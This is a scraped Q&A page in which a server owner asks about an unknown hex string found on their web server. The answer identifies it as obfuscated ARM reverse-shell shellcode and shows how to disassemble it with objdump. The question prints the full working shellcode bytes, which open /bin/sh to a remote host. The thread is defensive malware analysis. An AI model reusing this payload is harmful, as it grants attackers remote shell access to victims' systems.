stackoom
  简体   繁体   中英

Cannot decode shellcode found on my server

 原文  2023-01-15 15:27:00       binary/ ascii/ decode/ encode/ shellcode

Question

Today I was blown away by the slowness of my website, so I decided to look what was wrong. Looked at apache2, server bandwidth, incorrect configs, couldn't find anything. So on a whim I opened a random file I didn't know existed, at least I didn't put it there.

This is the code I found in the file:

\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x11\xa1\x8a\x78\x01\x3a\x8a\x70\x02\x21\x08\x1c\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06\x1c\x0b\xa1\x02\x23\x0b\x80\x10\x22\x02\x37\x01\xdf\x3e\x27\x01\x37\xc8\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x07\xa0\x92\x1a\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x01\x21\x08\x1c\x01\xdf\xc0\x46\xff\xff\x7b\xb4\xb9\x35\x5a\x13\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\xff\xc0\x46\xef\xbe\xad\xde

Can anyone push me in the right direction..? It looks like some malicious shell code. I've tried to decode it but couldn't figure out how it was encoded.

Thanks!

I have tried Ascii to text, binary to text, base64 to text. Only useful bit of text I found was /bin/ when I tried decoding in from ascii to text.

1 answers

solution1
 0  2023-01-23 00:47:15

It seems to be ARM reverse shell bin/sh shellcode.

Analysis

If the first nibble of every fourth byte is "e", then it is likely to be ARM code. This is because of conditional execution (always execute). In this case, the fourth and eight bytes are e2 and e1.

To convert into an ELF file and look at the disassembly you can do:

$ arm-none-eabi-objcopy -I binary -O elf32-littlearm data.bin data.elf
$ arm-none-eabi-objdump -D data.elf

The first two instructions are in ARM mode, that does a jump into thumb mode starting at adress 8.

   0:   e28f1001        add     r1, pc, #1
   4:   e12fff11        bx      r1

You can look at the thumb code with

arm-none-eabi-objdump -M force-thumb -D data.elf

The thumb code is then issuing some syscalls, and modifying itself to patch null bytes and add some obfuscation, to make our life harder.

I searched for the syscalls and some of the constants and found this: https://packetstormsecurity.com/files/151392/Linux-ARM-Reverse-Shell-Shellcode.html Not exactly the same, but very similar. The code you provided has some obfuscation added, and the IP-address/port changed.

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question Why I cannot execute a shellcode stored in an environment variable? C# - Decode server response (MSN, LSN) command not found when adding sudo before my command “Cannot execute binary file ” error on a server -> why ? Linux core? /bin/sh: my_custom command not found inside Docker container Decode sonar binary data in r Is it safe to encode and decode in c#? encode decode binary data Decode bits in C How to decode binary to ASCII?
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM